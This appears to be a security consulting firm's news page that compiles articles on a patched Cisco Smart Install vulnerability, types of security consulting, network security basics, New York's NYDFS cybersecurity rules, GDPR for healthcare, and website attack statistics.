CYBER SECURITY CONSULTING SERVICE AWARDS AND RECOGNITIONS
CyberSecOp's comprehensive managed security services, cyber security consulting, professional services, and data protection technology are recognized as industry-leading threat detection and response solutions by major analyst firms, key media outlets, and others.
Cisco Switches vulnerable to remote hacking
Security researchers at Embedi have disclosed a critical vulnerability in Cisco IOS Software and Cisco IOS XE Software that could allow an unauthenticated, remote attacker to execute arbitrary code, take full control over the vulnerable network equipment and intercept traffic.
The stack-based buffer overflow vulnerability (CVE-2018-0171) resides due to improper validation of packet data in Smart Install Client, a plug-and-play configuration and image-management feature that helps administrators to deploy (client) network switches easily.
Embedi has published technical details and Proof-of-Concept (PoC) code after Cisco today released patch updates to address this remote code execution vulnerability, which has been given a base Common Vulnerability Scoring System (CVSS) score of 9.8 (critical).
Researchers found a total of 8.5 million devices with the vulnerable port open on the Internet, leaving approximately 250,000 unpatched devices open to hackers.
To exploit this vulnerability, an attacker needs to send a crafted Smart Install message to an affected device on TCP port 4786, which is opened by default.
"To be more precise, the buffer overflow takes place in the function smi_ibc_handle_ibd_init_discovery_msg" and "because the size of the data copied to a fixed-size buffer is not checked, the size and data are taken directly from the network packet and are controlled by an attacker," Cisco explain in its advisory.
The vulnerability can also result in a denial-of-service condition (watchdog crash) by triggering indefinite loop on the affected devices.
Researchers demonstrated the vulnerability at a conference in Hong Kong after reporting it to Cisco in May 2017.
Affected Hardware and Software:
The vulnerability was tested on Catalyst 4500 Supervisor Engines, Cisco Catalyst 3850 Series Switches, and Cisco Catalyst 2960 Series Switches devices, as well as all devices that fall into the Smart Install Client type are potentially vulnerable, including:
- Catalyst 4500 Supervisor Engines
- Catalyst 3850 Series
- Catalyst 3750 Series
- Catalyst 3650 Series
- Catalyst 3560 Series
- Catalyst 2960 Series
- Catalyst 2975 Series
- IE 2000
- IE 3000
- IE 3010
- IE 4000
- IE 4010
- IE 5000
- SM-ES2 SKUs
- SM-ES3 SKUs
- NME-16ES-1G-P
- SM-X-ES3 SKUs
Cisco fixed the vulnerability in all of its affected products on 28th March 2018, and Embedi published a blog post detailing the vulnerability on 29th March. So, administrators are highly recommended to install free software updates to address the issue as soon as possible.
Security Specialist
Security Consulting
Many people who sell security products call themselves security consultants and they are part of the security field, but there are also security consultants who don't sell products. These individuals are paid on an hourly or project basis to help clients, usually, corporations, protect their personnel and property. Property security embraces both real estate and tangible equipment as well as other assets like client lists and proprietary technology. Employee and customer theft, as well as piracy, are possible focuses for a security consulting practice. Technical security consultants are knowledgeable about products, such as electronic security systems, including their development and how to apply them. The work may involve system design as well as drafting plans and documents.
Computer Security
While virtually all security consultants employ computer technology in their work, the computer security niche specifically involves protecting computer systems and networks themselves against unauthorized use and abuse. A computer security consultant often specializes in particular operating systems such as UNIX, LINUX or Windows.
Site Consulting
Whether it's new construction or remodeling, virtually every building and office-be it a high-tech industrial complex, retail franchise, distribution center, self-storage facility, housing development, hotel, resort, casino, parking lot or law firm-is interested in some aspect of site security. Security site consultants evaluate the physical design of such buildings and spaces, determine what security problems a sites poses and recommend countermeasures, such as guards, electronic security with cameras and electric lights, or a combination of methods and policies.
System Design
Security system designers develop specifications and provide architectural or engineering support in the design phase of a security consulting project. System designers may also develop new electronic security tools to be used at a particular location.
Forensic Consulting
Forensic security consultants serve as expert witnesses in trials in which security breaches are at issue, such as with fires, thefts, break-ins, and so on. Forensic consultants may specialize in any of the above fields.
As a security practitioner, you can also develop niches for your work based on the type of clients you work with, such as museums or historical sites, shipyards and airports. Unlike professional investigators, security consultants don't have to be licensed by state agencies. However, there are professional associations you can join and certification programs you can complete, which may help foster a sense of trust with your clients. One of the larger associations, which provides certification.
Specializing is key to marketing a security specialty business because it will help you more easily identify and market to clients who need such services, such as architects and contractors or members of a particular industry, such as software developers or law firms. You'll be soliciting work and attracting clients by making presentations and speeches or networking in organizations where you can showcase your expertise. In addition to your knowledge of security, you must be prepared to develop your speaking skills in order to attract new business.
What Is Network Security?
What Is Network Security? - CyberSecOp
Network security is an organization’s strategy and provisions for ensuring the security of its assets and all network traffic. Network security is manifested in an implementation of security hardware and software. For the purposes of this discussion, the following approach is adopted in an effort to view network security in its entirety.
Policy
The IT Security Policy is the principle document for network security. Its goal is to outline rules for ensuring the security of organizational assets. Employees today often utilize several tools and applications to conduct business productively. Policy-driven from the organization’s culture supports these routines and focuses on safely enabling these tools for employees. Enforcement and auditing procedures for any regulatory compliance to which an organization is subject must be mapped out in the policies, and controls as well.
Types of network security
Access control
Not every user should have access to your network. To keep out potential attackers, you need to recognize each user and each device. Then you can enforce your security policies. You can block noncompliant endpoint devices or give them only limited access. This process is network access control (NAC).
Antivirus and antimalware software
"Malware," short for "malicious software," includes viruses, worms, Trojans, ransomware, and spyware. Sometimes malware will infect a network but lie dormant for days or even weeks. The best antimalware programs not only scan for malware upon entry, but also continuously track files afterward to find anomalies, remove malware, and fix damage.
Application security
Any software you use to run your business needs to be protected, whether your IT staff builds it or whether you buy it. Unfortunately, any application may contain holes, or vulnerabilities, that attackers can use to infiltrate your network. Application security encompasses the hardware, software, and processes you use to close those holes.
Behavioral analytics
To detect abnormal network behavior, you must know what normal behavior looks like. Behavioral analytics tools automatically discern activities that deviate from the norm. Your security team can then better identify indicators of compromise that pose a potential problem and quickly remediate threats.
Data loss prevention
Organizations must make sure that their staff does not send sensitive information outside the network. Data loss prevention, or DLP, technologies can stop people from uploading, forwarding, or even printing critical information in an unsafe manner.
Email security
Email gateways are the number one threat vector for a security breach. Attackers use personal information and social engineering tactics to build sophisticated phishing campaigns to deceive recipients and send them to sites serving up malware. An email security application blocks incoming attacks and controls outbound messages to prevent the loss of sensitive data.
Firewalls
Firewalls put up a barrier between your trusted internal network and untrusted outside networks, such as the Internet. They use a set of defined rules to allow or block traffic. A firewall can be hardware, software, or both. Cisco offers unified threat management(UTM) devices and threat-focused next-generation firewalls.
Intrusion prevention systems
An intrusion prevention system (IPS) scans network traffic to actively block attacks. Next-Generation IPS (NGIPS) appliances do this by correlating huge amounts of global threat intelligence to not only block malicious activity but also track the progression of suspect files and malware across the network to prevent the spread of outbreaks and reinfection.
Mobile device security
Cybercriminals are increasingly targeting mobile devices and apps. Within the next 3 years, 90 percent of IT organizations may support corporate applications on personal mobile devices. Of course, you need to control which devices can access your network. You will also need to configure their connections to keep network traffic private.
Network Segmentation
Software-defined segmentation puts network traffic into different classifications and makes enforcing security policies easier. Ideally, the classifications are based on endpoint identity, not mere IP addresses. You can assign access rights based on role, location, and more so that the right level of access is given to the right people and suspicious devices are contained and remediated.
Security information and event management
SIEM products pull together the information that your security staff needs to identify and respond to threats. These products come in various forms, including physical and virtual appliances and server software.
VPN
A virtual private network encrypts the connection from an endpoint to a network, often over the Internet. Typically, a remote-access VPN uses IPsec or Secure Sockets Layer to authenticate the communication between device and network.
Web security
A web security solution will control your staff’s web use, block web-based threats, and deny access to malicious websites. It will protect your web gateway on site or in the cloud. "Web security" also refers to the steps you take to protect your own website.
Wireless security
Wireless networks are not as secure as wired ones. Without stringent security measures, installing a wireless LAN can be like putting Ethernet ports everywhere, including the parking lot. To prevent an exploit from taking hold, you need products specifically designed to protect a wireless network.
Cyber Security, New York Fights Back to Prevent Financial System Take Down
As hackers become more sophisticated and cyber attacks more routine, New York is on notice.
With a lack of leadership from the federal government, New York is one of the first states to implement new cyber regulations.
The state is quietly working to prevent a major cyber attack that could bring down Wall Street's financial system.
But even with the strictest cybersecurity regulations in the country, experts warn New York's efforts may still not be enough.
NEW YORK — Five months before the 9/11 attacks, US Secretary of Defense Donald Rumsfeld sent a memo to one of his advisers with an ominous message.
"Cyberwar," read the subject line.
"Please take a look at this article," Rumsfeld wrote, "and tell me what you think I ought to do about it. Thanks."
Attached was a 38-page paper, published seven months prior, analyzing the consequences of society's increasing dependence on the internet.
It was April 30, 2001. Optimistic investors and frenzied tech entrepreneurs were still on a high from the dot-com boom. The World Wide Web was spreading fast.
Once America's enemies got around to fully embracing the internet, the report predicted, it would be weaponized and turned against the homeland.
The internet would be to modern warfare what the airplane was to strategic bombers during World War I.
The paper's three authors — two PhD graduates and the founder of a cyber defense research center — imagined the damage a hostile foreign power could inflict on the US. They warned of enemies infecting computers with malicious code, and launching mass denial of service attacks that could bring down networks critical to the functioning of the American economy.
"[We] are concerned that US leadership, and other decision makers about Internet use, do not fully appreciate the potential consequences of the current situation," the report said. "We have built a network which has no concept whatsoever of national boundaries; in a war, every Internet site is directly on the front line. If we do not change course soon, we will pay a very high price for our lack of foresight."
The US government had a problem on its hands and it seemed a long ways from figuring out how to handle it.
More than 17 years later, that problem seems to have only gotten worse.
Follow the money
Willie Sutton, the notorious Brooklynite who spent his life in and out of prison, once told a reporter he robbed banks because that's where the money is. Computer hackers aren't so different.
In 2016, hackers attacked companies in the financial services sector more than companies in any other industry, according to IBM. Over 200 million financial records were breached that year, a 937% increase from 2015. And that's not including the incidents that were never made public.
As hackers become more sophisticated and cyber attacks more routine, New York is on notice. Home to the most valuable stock exchange on Earth, New York City is the financial capital of the world. When the market moves here, it moves everywhere.
So it was no surprise when in September 2016, Gov. Andrew Cuomo announced that the New York State Department of Financial Services (NYDFS) was gearing up to implement sweeping, first-of-their-kind cybersecurity regulations to protect the state's financial services industry — an unprecedented move no other state or federal agency had taken anywhere in the US.
Cybersecurity in New York's financial industry was previously governed by voluntary frameworks and suggested best practices. But the NYDFS introduced, for the first time, regulations that would be mandatory, including charging firms fines if they didn't comply.
Maria Vullo, the state's top financial regulator, told Business Insider that her No. 1 job is to protect New Yorkers.
"They're buying insurance. They're banking. They're engaging in financial transactions. And in each of those activities, they're providing their social security information, banking information, etc.," she said. "The companies that are obtaining that personal information from New Yorkers must protect it as much as possible because a breach of that information is of great consequence to the average New Yorker."
On March 1, the regulations turn a year old, although some of the rules are not yet in effect and will phase in overtime.
The NYDFS oversees close to 10,000 state-chartered banks, credit unions, insurance companies, mortgage loan servicers, and other financial institutions, in addition to 300,000 insurance licensees.
The combined assets of those organizations exceed $6 trillion, according to the NYDFS — and they're all in constant danger of being hacked.
Banks are vulnerable
In the summer of 2014, an American, two Israelis, and two co-conspirators breached a network server of JPMorgan Chase, the largest US bank.
They got hold of roughly 83 million customers' personal information, including names, addresses, phone numbers, and email addresses.
The hackers didn't steal any money from personal bank accounts, but that wasn't the point.
They wanted access to a massive trove of emails that they could use for a larger, separate money scam. In just three years, that operation netted the hackers more than $100 million.
The JPMorgan hack wasn't the end game. It was a piece of the puzzle.
The attack began with the simple theft of a JPMorgan employee's login credentials, which were located on a server that required just one password.
Most servers with sensitive information like a person's banking data require what's called multi-factor, or two-factor authentication.
But JPMorgan's security team had lapsed and failed to upgrade the server to include the dual password scheme, The New York Times reported at the time.
The attack, the breach, and the reputational damage that followed could have been avoided with tighter security. Instead, the hack went down as one of the largest thefts of customer data in US history.
"Banks are especially vulnerable," Matthew Waxman, a professor at Columbia Law School and co-chair of the Cybersecurity Center at the Columbia Data Science Institute, told Business Insider. "Disruption to the information systems on which banks rely could have shockwaves throughout the financial system, undermining public confidence in banking or knocking off line the ability to engage in commercial transactions."
That's the kind of catastrophic damage that worried the authors cited in Defense Secretary Rumsfeld's 2001 memo.
They weren't only concerned about stolen email addresses and social security numbers. They were worried about the fallout from such activity.
Banking works because consumers trust the system. But what if people lose trust?
Waiting until a catastrophe
News of impending cybersecurity regulations in New York in the fall of 2016 was both welcomed and shunned.
Some companies saw it as a chance to improve their own security standards while others complained of government overreach. Some were relieved to find they wouldn't have to make any adjustments to the way they operated. Others were overwhelmed by the heavy lifting they would have to do to comply.
How a company views the regulations depends in large part on its size. Bigger institutions with more cybersecurity professionals and more resources at their disposal tend to already have in place much of what the regulations require. Many smaller companies, which tend to be under-staffed and under-resourced, have a lot more work to do to catch up.
Jenny Cheng/Business Insider
The only additional thing Berkshire Bank has to do is sign off on its annual compliance form, which it sends to NYDFS to prove that it's doing everything it's supposed to be doing.
"We actually have to do nothing [new] from a compliance standpoint," the company's chief risk officer Gregory Lindenmuth told Business Insider.
While several cybersecurity consultants told Business Insider they acknowledge the NYDFS rules as a positive step in the right direction, they also point to a new law in Europe as a leading example of the role government has to play in protecting individuals' privacy rights and ensuring that companies secure consumers' personal information.
In 2016, the European parliament passed a law called the General Data Protection Regulation (GDPR) — landmark legislation that imposes millions of euros in fines on companies that do not adequately protect their customers' data.
Whereas the NYDFS regulations cover just one industry in one US state, the GDPR affects companies in all industries across all 28 member states of the European Union. Companies that do not report a data breach or fail to comply with the law more generally could be fined up to €20 million or 4% of its global revenue.
Matthew Waxman, the Columbia professor, says it's not surprising that the implementation of such a law remains far-fetched in the US.
"It's sometimes very difficult to get the government to take action against certain threats until a catastrophe takes place," Waxman said. "But that could change very suddenly if the banking system were knocked offline or another very major disruption to everyday life affected the lives and security of citizens on a massive scale."
But are the deterrents strong enough?
Data protection advocates calling for stricter cybersecurity regulations in the US are generally happy about the NYDFS rules.
For the first time, a state government is taking seriously the protection of consumer data, they say. It's giving companies in the financial sector an ultimatum: protect New Yorkers or face punishment.
"My big criticism of the regulations is there's no clear consequence for non-compliance," Thomas Boyden, the president of GRA Quantum and a cybersecurity expert who helps companies defend against cyber attacks, told Business Insider. "If companies don't feel like there's going to be any consequence for any action on their part, companies aren't going to take [the regulations] seriously."
In fact, for many companies, Boyden thinks "that's the default position."
Vullo, the head of the NYDFS, said she has the ability to fine companies that are not complying and is willing to exercise that authority, although how much that cost may be would depend case-by-case.
"I don't want this to be a punitive atmosphere, but obviously if institutions are not taking this seriously, then there will be consequences," she said. "But it's not the objective."
If anything, the objective is to make it clear that cyber threats are real and that New Yorkers and the companies that maintain their personal information are facing higher risks of attack.
Cybersecurity affects everyone, and Vullo said she hopes the regulations will help companies prioritize it.
"Everyone is part of our cybersecurity team," Theresa Pratt, the chief information security officer at Market Street Trust, a private trust company in New York, told Business Insider. "It doesn't matter what myself or my colleagues do from a technical perspective. If I have one user who clicks a bad link or answers a phisher's question over the phone, it's all for naught."
New York leading the way
The new rules have far-reaching implications beyond New York. A business in the state that has a parent company based in Germany, for example, still has to comply with the regulations.
This leaves some organizations in the precarious position of having to either restructure company-wide cybersecurity practices or build an entirely new and unique security apparatus that is specific to its New York offices.
"I do think that because of the scope of some of these regulations, they're kind of blurring the lines between countries and continents. I think we're going to see more and more of this," GreyCastle Security CEO Reg Harnish told Business Insider. The New York-based consulting firm is helping companies comply with the new regulations.
In the absence of leadership from the federal government on certain issues related to cybersecurity and data protection, states like New York are beginning to fill the void. Several cybersecurity experts told Business Insider that the NYDFS regulations could become a model for other industries or even policies at the national level.
Last year, at least 42 states introduced more than 240 bills or resolutions related to various cybersecurity issues, according to the National Conference of State Legislatures. And since the NYDFS rules took effect, financial regulators in Colorado and Vermont have followed New York's lead with cybersecurity regulations of their own.
Indeed, cyber experts have come a long way in better understanding the threats we face since Rumsfeld's dire cyberwar memo in 2001. But 17 years on, the former secretary of defense's concerns still seem as relevant as ever.
Perhaps the memo was a prescient warning — a warning that fell on deaf ears, but is not too late to address.
GDPR European Union General Data Protection Regulation
The European Union General Data Protection Regulation will go into effect on May 25, and healthcare organizations who treat patients from any of the 28 EU nations will need to familiarize themselves with the law to ensure compliance.
GDPR requires companies to gain affirmative consent for any data collected from people who reside in the EU. And organizations that violate the law could face fines up to four percent of their global annual revenue or 20 million euros -- whichever fine is higher.
While U.S. organizations must remain HIPAA-compliant, GDPR rules could be a game-changer for those who care for EU patients. Providers will need to consider data flows, cross-border data transfer, privacy and security monitoring, to ensure their policies are compliant with the law.
Tougher than HIPAA
GDPR is much more stringent than HIPAA, as it broadens the definition of personal data and covers any information associated with an “identified or identifiable natural person,” including computer IP addresses, photos, credit card data and the like.
The law also mandates organizations process data requests from EU patients much more quickly than with U.S. standards. And providers will also need clear permission to even use EU resident information.
Because of HIPAA, GDPR is nothing new for U.S. healthcare organizations, explained Kristen Johns, partner at Waller, a national healthcare law firm.
“But it will be a real shock for people who aren’t aware of the kind of data they hold and what they share with other vendors,” said Johns. “But for healthcare, it shouldn’t be a shock or learning curve.”
To Johns, there’s a fundamental difference between GDPR and HIPAA, as the EU law is based on personal rights, while HIPAA is focused more on the data itself and who can share it and what can be done with it.
Right to erasure and consent
One of the biggest challenges for U.S. provides will likely be the GDPR “right to be forgotten” or sometimes known as the right to erasure. One of the cornerstones of the law is to strengthen individual rights, meaning organizations must honor all patient requests to erase personal data.
It also places limits on how long data can be stored, covering all data not considered valuable to scientific research under GDPR definition. Organizations must implement technology capable of totally and completely erasing personal data upon request.
For the U.S., where it’s common to store patient data indefinitely, this will be a major change.
Notice of consent is the other area U.S. providers must fully understand, explained Johns. Providers should draft consent forms that outline what’s collected and make sure that they give a clear place for patients to opt in or out of data sharing or collection.
“Securing disclosure: It boils down to consent, something beyond what exists now in most cases,” Johns said. “You have to show that you have that chance to opt in and out easily. And consent has to be in clear, plain language. Currently, not all these healthcare consents are.”
Roughly translated, GDPR mandates the elimination of fine print, often overlooked by patients, which can contain loopholes in privacy policies. The idea is that organizations will need to simplify consent language so that it’s easy for patients to understand.
Tighter security
GDPR also cracks down on security requirements to ensure patient data is protected. This includes implementing pseudonymization and redundancy, along with routine pen testing and intrusion detection measures. Further, much like with HIPAA, organizations will need a continuous process to evaluate its security measures.
But one GDPR mandate that some healthcare organizations still haven’t gotten right is the need for encryption. Providers must lockdown all patient data -- if they haven’t already.
And one final security measure that is vastly different than HIPAA is that organizations will only have 72 hours to inform EU patients of a breach. HIPAA gives providers 60-days from the time of discovery.
“In reality, GDPR article is about data protection by design and by default,” said Johns. “It gives all identities that could be a data processor … a chance to look at their IT infrastructure and see where they can improve to comply with GDPR.”
There are plenty of lists online to determine how entities can be compliant with the data structure of each entity, and how it applies to internal audits, explained Johns. But for healthcare, “the big thing is the internal audit: looking to make sure they have the ability to access information quickly in a compliant way with GDPR and HIPAA.”
Enterprises understand cyber risks
Hackers and cyber criminals often seek to exploit human errors like misconfigurations, poor security practices and the use of shadow IT.
In order to help businesses assess the risk CyberSecOP is launching an automated advanced persistent threat (APT) simulation platform, LocPar, to continuously expose all attack vectors, above and below the surface.
LocPar uses advanced attack techniques to expose the most critical blind spots. In the process, it provides data-driven remediation that focuses on an organization's most critical assets, reduces its IT risk and enables it to optimize its cyber resources.
"The best way to prevent a cyber attack is to identify in advance the attack vectors hackers will use to compromise an organization's critical assets," says CEO and co-founder of XM Cyber Noam Erez. "Even when an organization has deployed and configured modern security controls, applied patches and refined policies, it should still ask 'Are my crown jewels really secure?' as there is a plethora of ways hackers can still infiltrate the system and compromise critical assets. This is why we founded CyberSecOp: to equip enterprises with a continuous 360° view of which critical assets are at risk, what security issues they should focus on, and how best to harness their resources to resolve them."
Features of LocPar include full mapping of all attack paths at any given time, automatic adaptation to the context of the organization, using misconfigurations, user activity, credentials and security vulnerabilities in the network.
Comprehensive and up-to-date attack scenarios use the latest hackers' techniques and methods, giving the ability to detect and remediate IT-related risks in real-time. Reports are produced based on how critical the attack vector is.
Image Credit: SergeyNivens / depositphotos.com
Secure Your Website, from Cyber Attacks
The average website was attacked 44 times a day during the last quarter of 2017, according to new research from security specialist SiteLock.
The company analyzed six million sites to identify trends in the behavior and tactics of attackers. Though the number of attacks represents a 25 percent decrease over the previous quarter, it still means a site could be attacked 16,000 times a year.
"A decrease in attacks does not mean that websites are safer. In fact, it may even be the opposite," says Neill Feather, president of SiteLock on the company's blog. "Hackers are constantly trying new avenues and even leveraging older tactics that continue to be successful. As our research shows, cybercriminals are now able to successfully breach a site with fewer, more targeted attacks. Now more than ever, businesses need to evaluate their current security posture and ensure they have both the right technology and a response plan in place should a hack occur."
Among other findings are that around one percent of sites sampled are infected with malware each week. Yet only 19 percent of infected sites are blacklisted by search engines. WordPress sites using plugins are twice as likely to be infected as sites that don’t employ a content management system. In addition, 46 percent of infected WordPress sites have the latest core updates. The average number of infected files per site increased by 0.8 percent to 309.
The malware being used is increasingly complex too. 51 of the malware found was categorized as Encoded Malware, meaning it was randomly generated or difficult to decode. These are often parts of groups of files called 'attack kits'. Backdoors made up 12 percent of files, resulting in more files being uploaded to infected sites.
NYDFS Cybersecurity Retain a CISO, CSO -Regulation Compliance
With cyber-attacks on the rise and comprehensive federal cybersecurity policy lacking for the financial services industry, New York is leading the nation with strong cybersecurity regulation requiring, among other protective measures, set minimum standards of a cybersecurity program based on the risk assessment of the entity, personnel, training, and controls in place in order to protect data and information systems, said Superintendent in a press release issued by DFS, CyberSecOP helping financial organisation comply with the NYDFS manadates.
With the New York Department of Financial Services’ (NY DFS) new terms poised to come into effect next month, banks and financial services companies operating in the state must start preparing for the change.
One of the most discussed issues in the controversial proposal is the requirement to appoint a CISO (chief information security officer). The move was met by heavy criticism at a hearing in December last year, leading to a massive backtrack from the DFS in a revised proposal.
Requirements of the CISO
The latest proposal removes any explicit requirement to hire a CISO, which is good news for many smaller or rural financial institutions that don’t currently have one in place. What this means, practically, is that the position is no longer necessarily exclusive. Banks can choose to designate someone to complete the tasks of a CISO while also performing other duties. Alongside this, the proposal does not state that the specific title of ‘CISO’ is required.
So what will the CISO (or CISO by any other name) be asked to do? The role now covers a broader set of responsibilities but in a less detailed manner. The designated person will have to provide an annual report to the board of directors (previously proposed as a biannual report) on the “cybersecurity program and material cybersecurity risks”, according to the proposal. It is now specified that the report must be “in writing” but it no longer needs to be provided to the NY DFS upon request.
The required content of the report will now also be less extensive. The CISO must identify and report only on material cyber risks rather than all cyber risks. This will involve “consider[ing]” those issues “to the extent applicable.” Additionally, the CISO will be able to tailor their focus to the issues appropriate to their organization.
Finding the right candidate
The NY DFS’ revision allowing the CISO to be an employee of the covered entity (i.e. an internal hire), or an affiliate or third-party service provider offers crucial flexibility for smaller financial institutions.
Companies with only a handful of employees – the most vocal in their frustration at the DFS’ initial plans – may look to shuffle their existing staff.
When doing that – or in making a new hire – there are certain things organizations need to look for. The CISO role is not just a tech-specific position, notes John Linkous, RSA Conference’s technology advisor, but they must now be “a trusted advisor to the business as a whole”. He adds:
“One of the most critical capabilities is simply the ability to understand the business much more intimately than his or her predecessors. Business drives the need for technology, and so security must be focused on how data is used within those business functions, across the end-to-end spectrum. Without a solid understanding of what the organization does, and how it makes money, an information security officer is going to have a fundamental disconnect with what’s needed to protect the enterprise.”
Third-party service providers or affiliates
Given the responsibility placed on the CISO, outsourcing the role to a third party can be an appealing proposition.
Going down this route presents its own set of issues, though. As TechTarget reported, third parties are “almost always” involved when it comes cyber breaches – arguing that it is either through a lack of accountability or oversight. While service-level agreements (SLAs) are always advised, the DFS has taken steps to ensure the right measures are in place. In response to the fear that financial services firms would not always have sufficient power to force third parties to accept their preferred provisions, the NY DFS now dictates that all third-party services must be performed under contractual provisions rather than by way of “relevant guidelines for due diligence.”
Source: www.itgovernanceusa.com